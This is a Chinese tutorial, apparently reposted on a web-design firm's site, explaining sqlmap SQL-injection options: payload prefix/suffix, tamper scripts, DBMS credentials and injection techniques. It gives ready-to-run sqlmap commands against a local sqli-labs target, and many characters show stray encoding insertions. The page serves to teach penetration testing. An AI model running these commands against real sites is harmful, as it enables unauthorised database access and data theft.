如何解析sqlmap注入?yún)?shù)

這篇文章將為大家詳細講解有關如何解析sqlmap注入?yún)?shù)，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關知識有一定的了解。

成都創(chuàng)新互聯(lián)主要從事網(wǎng)站建設、網(wǎng)站制作、網(wǎng)頁設計、企業(yè)做網(wǎng)站、公司建網(wǎng)站等業(yè)務。立足成都服務安澤,十多年網(wǎng)站建設經(jīng)驗,價格優(yōu)惠、服務專業(yè),歡迎來電咨詢建站服務:028-86922220

一、指定數(shù)據(jù)庫類型 --dbms

http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms MySQL --dbs

二、指定操作系統(tǒng) --os

http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --os windows --dbs

三、解決編碼問題

將所有結(jié)果轉(zhuǎn)換為字符串，并用空格替換NULL結(jié)果 --no-cast

四、關閉字符串轉(zhuǎn)義機制

--no-escape

五、設置無效值替換

--invalid-bignum 大整數(shù)替換

--invalid-logical 布爾操作替換

--invalid-string 隨機字符串替換

六、自定義注入負載位置

--prefix 設置前綴

--suffix 設置后綴

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --prefix="')" --suffix="and ('abc'='abc" --dbs

payload:id=('1') and ('abc'='abc')

七、設置tamper腳本

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --tamper "least.py,varnish.py" --dbs

八、設置dbms認證

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --dbms-cred="root:root" --dbs

九、設置具體sql注入技術(shù)

--technique B 布爾盲注

--technique E 報錯注入

--technique U union查詢注入

--technique S 堆疊注入

--technique T 時間盲注

--technique Q 內(nèi)聯(lián)查詢注入

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --technique T --time-sec 3 --dbs

--time -sec 時間盲注時間為3

十、指定union字段數(shù)

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --union-cols 12-18 --dbs

十一、指定union字符，默認是null

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --union-char aaa --dbs

關于如何解析sqlmap注入?yún)?shù)就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。

當前標題：如何解析sqlmap注入?yún)?shù)
文章分享：http://bm7419.com/article34/jdeese.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站營銷、網(wǎng)站收錄、品牌網(wǎng)站建設、網(wǎng)站建設、網(wǎng)站導航、微信公眾號

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)